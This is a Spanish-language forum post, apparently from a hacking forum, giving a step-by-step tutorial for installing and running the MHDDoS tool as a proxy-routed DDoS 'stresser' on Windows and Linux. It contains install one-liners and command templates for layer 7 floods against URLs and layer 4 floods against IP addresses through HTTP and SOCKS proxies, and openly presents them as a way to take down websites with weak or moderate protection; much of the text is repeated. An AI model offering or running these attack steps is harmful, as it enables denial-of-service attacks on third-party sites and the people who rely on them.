¡Buenas a todos!
Este es mi segundo post, y para darle duro, voy a publicar un tutorial de como montar una especio de botnet (no es un c2, más bien es un stresser) que funciona a través de proxies (tanto http, socks4 y socks5).
Muy bien, como no me quiero enrollar mucho, os dejo el tutorial por aquí abajo.
¡Un saludo y nos vemos en el próximo post!
Este es mi segundo post, y para darle duro, voy a publicar un tutorial de como montar una especio de botnet (no es un c2, más bien es un stresser) que funciona a través de proxies (tanto http, socks4 y socks5).
Muy bien, como no me quiero enrollar mucho, os dejo el tutorial por aquí abajo.
Lo primero, este stresser se puede usar tanto en Windows como en Linux. Mi recomendación es que la uséis en una VPS con una conexión buena y rápida, pero como sé que no todos tenemos una, pues os voy a hacer el tutorial tanto en Windows como en Linux (por si lo queréis poner en una VM).
El script que vamos a usar es el siguiente: https://github.com/MatrixTM/MHDDoS.
Como podéis ver, tiene más de 40 métodos tanto en layer 4 (por IP) como en layer 7 (por web, que es el que mejor funciona) para tirar cualquier cosa de la forma que os de la gana. A continuación, os hago los tutoriales para instalarlo.
Windows:
Antes de empezar, aseguraos tener python instalado y con la ruta pip bien puesta.
- 1: Nos descargamos el repo de github, y lo extraemos en donde os de la gana.
- 2: Ahora vamos a abrir la cmd, hacemos un cd al repo y ponemos el siguiente comando:
Esto lo que hará es instalar todos los requisitos esenciales para que podamos usar el script.
- 3: Ahora, si todo ha ido bien, para atacar una web con proxies ponemos el siguiente comando:
En cambio, si queremos atacar un servidor por IP (layer 4), usamos el siguiente comando:
DOS: python start.py <1=method> <2=iport> <3=threads> <4=duration> <5=debug=optional>
DDOS (usando los proxies): python start.py <1=method> <2=iport> <3=threads> <4=duration> <5=socks_type> <6=proxylist> <7=debug=optional>
- 4: Para consultar todos los métodos y aprender más sobre este script, recomiendo mirar la wiki que tienen oficial. Yo os he hecho un mini esquema de como funciona, pero si queréis dominarlo, os recomiendo usar la wiki.
Linux:
Antes de empezar, aseguraos tener python instalado y con la ruta pip bien puesta.
- 1: Para instalar todo de una, os recomiendo usar este comando:
- 2: Ahora, si todo ha ido bien, para atacar una web con proxies ponemos el siguiente comando:
En cambio, si queremos atacar un servidor por IP (layer 4), usamos el siguiente comando:
DOS: python3 start.py <1=method> <2=iport> <3=threads> <4=duration> <5=debug=optional>
DDOS (usando los proxies): python start.py <1=method> <2=iport> <3=threads> <4=duration> <5=socks_type> <6=proxylist> <7=debug=optional>
- 4: Para consultar todos los métodos y aprender más sobre este script, recomiendo mirar la wiki que tienen oficial. Yo os he hecho un mini esquema de como funciona, pero si queréis dominarlo, os recomiendo usar la wiki.
Cabe destacar que si ponéis un txt random en el apartado de proxylist os crea un txt nuevo y os scrapea y checkea unos cuantos proxies.
Me he intentado explicar lo mejor que he podido, pero bueno espero que os sirva. No es la gran novedad pero para tirar páginas panchas o páginas con protección más o menos decente os viene muy bien.
El script que vamos a usar es el siguiente: https://github.com/MatrixTM/MHDDoS.
Como podéis ver, tiene más de 40 métodos tanto en layer 4 (por IP) como en layer 7 (por web, que es el que mejor funciona) para tirar cualquier cosa de la forma que os de la gana. A continuación, os hago los tutoriales para instalarlo.
Windows:
Antes de empezar, aseguraos tener python instalado y con la ruta pip bien puesta.
- 1: Nos descargamos el repo de github, y lo extraemos en donde os de la gana.
- 2: Ahora vamos a abrir la cmd, hacemos un cd al repo y ponemos el siguiente comando:
Código:
pip install -r requirements.txt
- 3: Ahora, si todo ha ido bien, para atacar una web con proxies ponemos el siguiente comando:
Código:
python start.py <1=method> <2=url> <3=socks_type> <4=threads> <5=proxylist> <6=rpc (esto lo ponéis a 100 y ya)> <7=duration> <8=debug=optional (esto recomiendo dejarlo en true para que veas como va el ataque)>
DOS: python start.py <1=method> <2=iport> <3=threads> <4=duration> <5=debug=optional>
DDOS (usando los proxies): python start.py <1=method> <2=iport> <3=threads> <4=duration> <5=socks_type> <6=proxylist> <7=debug=optional>
- 4: Para consultar todos los métodos y aprender más sobre este script, recomiendo mirar la wiki que tienen oficial. Yo os he hecho un mini esquema de como funciona, pero si queréis dominarlo, os recomiendo usar la wiki.
Linux:
Antes de empezar, aseguraos tener python instalado y con la ruta pip bien puesta.
- 1: Para instalar todo de una, os recomiendo usar este comando:
Código:
apt -y update && apt -y install curl wget libcurl4 libssl-dev python3 python3-pip make cmake automake autoconf m4 build-essential git && git clone https://github.com/MatrixTM/MHDDoS.git && cd MHDDOS && pip3 install -r requirements.txt
Código:
python3 start.py <1=method> <2=url> <3=socks_type> <4=threads> <5=proxylist> <6=rpc (esto lo ponéis a 100 y ya)> <7=duration> <8=debug=optional (esto recomiendo dejarlo en true para que veas como va el ataque)>
DOS: python3 start.py <1=method> <2=iport> <3=threads> <4=duration> <5=debug=optional>
DDOS (usando los proxies): python start.py <1=method> <2=iport> <3=threads> <4=duration> <5=socks_type> <6=proxylist> <7=debug=optional>
- 4: Para consultar todos los métodos y aprender más sobre este script, recomiendo mirar la wiki que tienen oficial. Yo os he hecho un mini esquema de como funciona, pero si queréis dominarlo, os recomiendo usar la wiki.
Cabe destacar que si ponéis un txt random en el apartado de proxylist os crea un txt nuevo y os scrapea y checkea unos cuantos proxies.
Me he intentado explicar lo mejor que he podido, pero bueno espero que os sirva. No es la gran novedad pero para tirar páginas panchas o páginas con protección más o menos decente os viene muy bien.
¡Un saludo y nos vemos en el próximo post!